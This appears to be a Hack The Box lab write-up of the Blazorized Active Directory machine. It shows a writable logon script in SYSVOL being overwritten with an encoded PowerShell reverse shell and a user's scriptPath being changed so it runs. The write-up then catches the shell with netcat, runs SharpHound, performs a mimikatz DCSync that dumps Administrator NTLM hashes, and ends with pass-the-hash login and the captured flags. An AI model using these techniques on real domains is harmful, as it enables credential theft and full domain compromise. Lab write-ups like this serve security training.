useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
whencreated : 1/10/2024 2:32:00 PM
primarygroupid : 513
pwdlastset : 2/25/2024 11:56:55 AM
usnchanged : 345421
*Evil-WinRM* PS C:\Users\RSA_4810\Documents> Get-SmbShare
Name ScopeName Path Description
---- --------- ---- -----------
ADMIN$ * Remote Admin
C$ * Default share
IPC$ * Remote IPC
NETLOGON * Logon server share
SYSVOL * Logon server share
*Evil-WinRM* PS C:\windows\sysvol> ls -Recurse -Filter '02FCE0D1303F.bat' -ErrorAction SilentlyContinue
Directory: C:\windows\sysvol\domain\scripts\A32FF3AEAA23
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/3/2024 8:56 AM 178 02FCE0D1303F.bat
Directory: C:\windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/3/2024 8:56 AM 178 02FCE0D1303F.bat
Logon scripts live under C:\WINDOWS\SYSVOL\domain\scripts, which is what the NETLOGON share maps to, so the scriptpath above is resolved relative to that directory.
Logon Script
Check what's in SSA_6010's logon script:
*Evil-WinRM* PS C:\windows\sysvol\domain\scripts\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF> cat 2C0A3DFE2030.bat
:: TO-DO: Notify LSA_3214 to write the logonScript for SSA_6010
Get the permissions on it:
*Evil-WinRM* PS C:\windows\sysvol> $acl = Get-Acl C:\windows\sysvol\domain\scripts\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030.bat
*Evil-WinRM* PS C:\windows\sysvol> foreach ($property in $acl.PSObject.Properties) {
Write-Output "$($property.Name): $($property.Value)"
}
PSPath: Microsoft.PowerShell.Core\FileSystem::C:\windows\sysvol\domain\scripts\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030.bat
PSParentPath: Microsoft.PowerShell.Core\FileSystem::C:\windows\sysvol\domain\scripts\A32FF3AEAA23
PSChildName: 2C0A3DFE2030.bat
PSDrive: C
PSProvider: Microsoft.PowerShell.Core\FileSystem
CentralAccessPolicyId:
CentralAccessPolicyName:
Path: Microsoft.PowerShell.Core\FileSystem::C:\windows\sysvol\domain\scripts\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030.bat
Owner: BLAZORIZED\RSA_4810
Group: BLAZORIZED\Domain Users
Access: System.Security.AccessControl.FileSystemAccessRule System.Security.AccessControl.FileSystemAccessRule System.Security.AccessControl.FileSystemAccessRule System.Security.AccessControl.FileSystemAccessRule System.Security.AccessControl.FileSystemAccessRule System.Security.AccessControl.FileSystemAccessRule
Sddl: O:S-1-5-21-2039403211-964143010-2924010611-1107G:DUD:AI(A;ID;0x1201bf;;;S-1-5-21-2039403211-964143010-2924010611-1107)(A;ID;0x1200a9;;;AU)(A;ID;0x1200a9;;;SO)(A;ID;FA;;;BA)(A;ID;FA;;;SY)(A;ID;FA;;;S-1-5-21-2039403211-964143010-2924010611-1107)
AccessToString: BLAZORIZED\RSA_4810 Allow Write, ReadAndExecute, Synchronize
NT AUTHORITY\Authenticated Users Allow ReadAndExecute, Synchronize
BUILTIN\Server Operators Allow ReadAndExecute, Synchronize
BUILTIN\Administrators Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
BLAZORIZED\RSA_4810 Allow FullControl
AuditToString:
AccessRightType: System.Security.AccessControl.FileSystemRights
AccessRuleType: System.Security.AccessControl.FileSystemAccessRule
AuditRuleType: System.Security.AccessControl.FileSystemAuditRule
AreAccessRulesProtected: False
AreAuditRulesProtected: False
AreAccessRulesCanonical: True
AreAuditRulesCanonical: True
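The Sddl line above is the compact form of the same ACL that AccessToString prints. As an added example (not part of the writeup), the parser below decodes that string, expands the access masks the way .NET's FileSystemRights does, resolves the two-letter trustee aliases, and reports who can change the file; the SID-to-name map is an assumption built from the whoami output earlier on this page (RSA_4810 is RID 1107). Run on the page's SDDL it confirms the conclusion that matters here: RSA_4810 owns the script and holds FullControl, so we can overwrite it.

```python
import re

# Two-letter SDDL trustee aliases that occur in the ACL above (subset of the full table).
WELL_KNOWN_SIDS = {
    "AU": "NT AUTHORITY\\Authenticated Users",
    "SO": "BUILTIN\\Server Operators",
    "BA": "BUILTIN\\Administrators",
    "SY": "NT AUTHORITY\\SYSTEM",
    "DU": "Domain Users",
    "WD": "Everyone",
}
# Assumed mapping taken from the earlier whoami output (rsa_4810 = RID 1107).
DOMAIN_SIDS = {"S-1-5-21-2039403211-964143010-2924010611-1107": "BLAZORIZED\\RSA_4810"}

# SDDL rights abbreviations for file objects plus the generic bits.
RIGHTS_ALIASES = {
    "FA": 0x1F01FF, "FR": 0x120089, "FW": 0x120116, "FX": 0x1200A0,
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
}
# .NET FileSystemRights composites, most inclusive first, so masks print like AccessToString.
FS_RIGHTS = [("FullControl", 0x1F01FF), ("Modify", 0x301BF), ("Write", 0x116),
             ("ReadAndExecute", 0x200A9), ("Read", 0x20089), ("Synchronize", 0x100000)]
# WRITE_DATA | APPEND_DATA | DELETE | WRITE_DAC | WRITE_OWNER | GENERIC_ALL | GENERIC_WRITE:
# any of these lets the trustee change the script or take control of it.
MODIFY_BITS = 0x2 | 0x4 | 0x10000 | 0x40000 | 0x80000 | 0x10000000 | 0x40000000

SDDL_RE = re.compile(r"O:(?P<owner>.+?)G:(?P<group>.+?)D:(?P<flags>[A-Z]*)(?P<aces>(?:\([^)]*\))*)")

# The SDDL string printed by Get-Acl above.
PAGE_SDDL = ("O:S-1-5-21-2039403211-964143010-2924010611-1107G:DUD:AI"
             "(A;ID;0x1201bf;;;S-1-5-21-2039403211-964143010-2924010611-1107)"
             "(A;ID;0x1200a9;;;AU)(A;ID;0x1200a9;;;SO)(A;ID;FA;;;BA)(A;ID;FA;;;SY)"
             "(A;ID;FA;;;S-1-5-21-2039403211-964143010-2924010611-1107)")


def decode_rights(rights: str) -> int:
    """Rights field is either a hex mask (0x1201bf) or concatenated 2-letter aliases (FA, GRGW)."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    mask = 0
    for i in range(0, len(rights), 2):
        mask |= RIGHTS_ALIASES[rights[i:i + 2]]
    return mask


def describe_mask(mask: int) -> str:
    """Render a mask as the FileSystemRights names PowerShell shows."""
    parts, remaining = [], mask
    for name, bits in FS_RIGHTS:
        if remaining & bits == bits:
            parts.append(name)
            remaining &= ~bits
    if remaining:
        parts.append(hex(remaining))
    return ", ".join(parts)


def resolve_sid(sid: str) -> str:
    return WELL_KNOWN_SIDS.get(sid) or DOMAIN_SIDS.get(sid) or sid


def parse_sddl(sddl: str) -> dict:
    m = SDDL_RE.match(sddl)
    if not m:
        raise ValueError("not an O:/G:/D: SDDL string")
    aces = []
    for ace in re.findall(r"\(([^)]*)\)", m.group("aces")):
        ace_type, flags, rights, _obj, _inherit_obj, sid = ace.split(";")
        aces.append({"type": ace_type, "flags": flags, "mask": decode_rights(rights), "sid": sid})
    return {"owner": m.group("owner"), "group": m.group("group"),
            "dacl_flags": m.group("flags"), "aces": aces}


def who_can_modify(sddl: str) -> list:
    """Trustees with an Allow ACE carrying a modify bit, plus the owner, who always holds
    implicit READ_CONTROL and WRITE_DAC and can therefore grant itself anything."""
    acl = parse_sddl(sddl)
    writers = {resolve_sid(a["sid"]) for a in acl["aces"]
               if a["type"] == "A" and a["mask"] & MODIFY_BITS}
    writers.add(resolve_sid(acl["owner"]))
    return sorted(writers)


if __name__ == "__main__":
    acl = parse_sddl(PAGE_SDDL)
    print("owner:", resolve_sid(acl["owner"]))
    for ace in acl["aces"]:
        print(f"{resolve_sid(ace['sid']):40} Allow {describe_mask(ace['mask'])}")
    print("can modify:", who_can_modify(PAGE_SDDL))
```

The same parser works on any file SDDL you pull out of SYSVOL with (Get-Acl ...).Sddl, which makes it easy to sweep every logon script for ones a low-privileged principal can write to.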
Note: if the output below looks inconsistent, it's because of other players; I had to reset the machine.
Villain > generate payload=windows/netcat/powershell_reverse_tcp lhost=tun0 encode
Generating backdoor payload...
powershell -ep bypass -e BASE64_ENCODED_PAYLOAD
---
*Evil-WinRM* PS C:\windows\sysvol\domain\scripts\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030> echo 'powershell -ep bypass -e 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' > C:\windows\sysvol\domain\scripts\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030.bat
*Evil-WinRM* PS C:\windows\sysvol\domain\scripts\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF> Set-DomainObject SSA_6010 -Set @{'scriptPath'='\\dc1\NETLOGON\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030\2C0A3DFE2030.bat'} -Verbose
Verbose: [Get-DomainSearcher] search base: LDAP://DC=blazorized,DC=htb
Verbose: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=SSA_6010)(name=SSA_6010)(displayname=SSA_6010))))
Verbose: [Set-DomainObject] Setting 'scriptPath' to '\\dc1\NETLOGON\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030\2C0A3DFE2030.bat' for object 'SSA_6010'
I'm not sure why, but the Villain payload kept failing to get a connection from the logon script. Using the Powershell #3 (Base64) payload made the connection. Meanwhile I was trying different things and ended up using the following path. The domain directory would probably also have worked, but I'm not going to test it since I have a shell. (scriptPath is resolved relative to the NETLOGON share, which is why the short relative path below works.)
*Evil-WinRM* PS C:\windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23> Set-DomainObject SSA_6010 -Set @{'scriptPath'='A32FF3AEAA23\rev.bat'} -Verbose
*Evil-WinRM* PS C:\windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23> upload rev2.bat C:\windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23\rev.bat
*Evil-WinRM* PS C:\windows\sysvol\sysvol\blazorized.htb\scripts\A32FF3AEAA23> Get-DomainUser | ? { $_.Displayname -eq "SSA_6010" } | Select name, scriptpath, lastlogon, logoncount
name scriptpath lastlogon logoncount
---- ---------- --------- ----------
SSA_6010 A32FF3AEAA23\rev.bat 7/3/2024 11:20:59 AM 3125
Privilege Escalation (Administrator)
└─$ listen
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.11.22:51683.
PS C:\Windows\system32> whoami /all
User Name SID
=================== =============================================
blazorized\ssa_6010 S-1-5-21-2039403211-964143010-2924010611-1124
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Group used for deny only
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
BLAZORIZED\Super_Support_Administrators Group S-1-5-21-2039403211-964143010-2924010611-1123 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Gather data as the ssa_6010 user and exfiltrate it.
PS C:\users\public> .\SH.exe -c all --zipfilename sh.zip
---
*Evil-WinRM* PS C:\users\public> download 20240703113106_sh.zip

Since mimikatz is interactive, I upgraded the netcat shell to ConPtyShell.
└─$ cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .
---
*Evil-WinRM* PS C:\users\public> upload mimikatz.exe mimi.exe
---
DCSync the Administrator account (it succeeds, so ssa_6010 holds domain replication rights):
mimikatz # lsadump::dcsync /user:administrator
[DC] 'blazorized.htb' will be the domain
[DC] 'DC1.blazorized.htb' will be the DC server
[DC] 'administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 2/25/2024 12:54:43 PM
Object Security ID : S-1-5-21-2039403211-964143010-2924010611-500
Object Relative ID : 500
Credentials:
Hash NTLM: f55ed1465179ba374ec1cad05b34a5f3
ntlm- 0: f55ed1465179ba374ec1cad05b34a5f3
ntlm- 1: eecc741ecf81836dcd6128f5c93313f2
ntlm- 2: c543bf260df887c25dd5fbacff7dcfb3
ntlm- 3: c6e7b0a59bf74718bce79c23708a24ff
ntlm- 4: fe57c7727f7c2549dd886159dff0d88a
ntlm- 5: b471c416c10615448c82a2cbb731efcb
ntlm- 6: b471c416c10615448c82a2cbb731efcb
ntlm- 7: aec132eaeee536a173e40572e8aad961
ntlm- 8: f83afb01d9b44ab9842d9c70d8d2440a
ntlm- 9: bdaffbfe64f1fc646a3353be1c2c3c99
lm - 0: ad37753b9f78b6b98ec3bb65e5995c73
lm - 1: c449777ea9b0cd7e6b96dd8c780c98f0
lm - 2: ebbe34c80ab8762fa51e04bc1cd0e426
lm - 3: 471ac07583666ccff8700529021e4c9f
lm - 4: ab4d5d93532cf6ad37a3f0247db1162f
lm - 5: ece3bdafb6211176312c1db3d723ede8
lm - 6: 1ccc6a1cd3c3e26da901a8946e79a3a5
lm - 7: 8b3c1950099a9d59693858c00f43edaf
lm - 8: a14ac624559928405ef99077ecb497ba
...
Go over to CrackStation with the NTLM hashes.

Trying Administrator with the cracked password failed (presumably it came from one of the password-history hashes rather than the current ntlm-0):
└─$ evil-winrm -i 10.10.11.22 -u 'administrator' -p 'qaz123!'
Using pass-the-hash with the current NTLM hash we are able to log in:
└─$ evil-winrm -i 10.10.11.22 -u 'administrator' -H 'f55ed1465179ba374ec1cad05b34a5f3'
Flags
*Evil-WinRM* PS C:\Users> ls -Recurse -Filter *.txt
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/29/2024 3:42 PM 159 note.txt
-ar--- 7/3/2024 2:04 PM 34 root.txt
Directory: C:\Users\NU_1055\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/3/2024 2:04 PM 34 user.txt
*Evil-WinRM* PS C:\Users> ls -Recurse -Filter *.txt | cat
If you enjoyed this machine and want to learn more about DACL attacks, check out the 'DACL Attacks I' and 'DACL Attacks II' modules on HTB Academy.
- Pedant
5c81a83ff1166d58a4883b51762daea0
2bcf338975762fac5c9e0ca044dcfbeb
Writeup referenced: https://blog.csdn.net/m0_52742680/article/details/140102307